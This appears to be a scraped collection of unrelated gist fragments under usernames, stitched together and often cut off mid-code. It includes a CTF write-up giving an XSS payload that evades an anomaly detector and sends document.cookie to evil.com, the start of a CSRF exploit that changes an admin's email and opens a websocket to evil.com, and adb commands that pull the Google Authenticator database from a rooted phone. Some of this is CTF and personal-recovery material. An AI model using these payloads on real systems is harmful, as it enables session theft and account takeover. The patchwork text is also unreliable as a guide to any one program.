ngo

In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.

We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):

anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>

cgvwzq

<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
    // change admin's email
    <input type="text" name="email" value="wololo@coolmail.com">
    <input type="text" name="csrf" value="">
    <input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";

phonicmouse

#!/bin/bash

# Very secure OpenVPN server installer for CentOS


if [[ "$EUID" -ne 0 ]]; then
	echo "Sorry, you need to run this as root"
	exit 1
fi

xymopen

############################################################################
#
#  IntelliJ IDEA Java Decompiler wrapper script for Windows
#
#  @see https://stackoverflow.com/questions/28389006/how-to-decompile-to-java-files-intellij-idea/30106981
#  @see https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine
#
############################################################################

$IDEA_PATH = "$Env:ProgramFiles\JetBrains\IntelliJ IDEA 2020.1.1"

hanula

aa.je
ae.je
ae.gg
ae.ht
af.je
af.cx
af.gg
af.gl
af.ht
ah.je

mike-seiler

aj.rs
aw.rs
ay.rs
bd.rs
bf.rs
bh.rs
bj.rs
bq.rs
bx.rs
cj.rs

trongthanh

<!-- Instructions:
- Download and unzip Mojave dynamic background here: https://files.rb.gd/mojave_dynamic.zip 
- Rename the extracted folder as "mojave-background" (Excuse the trouble but I renamed it on my machine and already use that path in the XML file)
- Save this xml file next to the Mojave background files
- Fix the path to the background images below (better using absolute path)
- Lastly, either: 
  + GNOME: Use gnome-tweaks tool to select this XML as wallpaper (as default wallpaper settings won't let you choose wallpaper from custom path)
  + MATE: Go to background setting (in Appearance) > Choose +Add... > make sure **All files** filter is selected at the bottom right > Then choose mojave.xml
-->
<background>

akalongman

ini_set('soap.wsdl_cache_enabled', 0);
ini_set('soap.wsdl_cache_ttl', 900);
ini_set('default_socket_timeout', 15);


$params = array('param1'=>$param1);


$wsdl = 'http://service_url/method?WSDL';

haccer

#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt

# Premium
function ech() {
  spinner=( "|" "/" "-" "\\" )
  while true; do
    for i in ${spinner[@]}; do
      echo -ne "\r[$i] $1"

jbinto

### Last tested February 7 2014 on a Galaxy S3 (d2att) running Cyanogenmod 11 nightly, with Google Authenticator 2.49.

### Device with Google Authenticator must have root.
### Computer requires Android Developer Tools and SQLite 3.

### Connect your device in USB debugging mode.

$ cd /tmp
$ adb root
$ adb pull /data/data/com.google.android.apps.authenticator2/databases/databases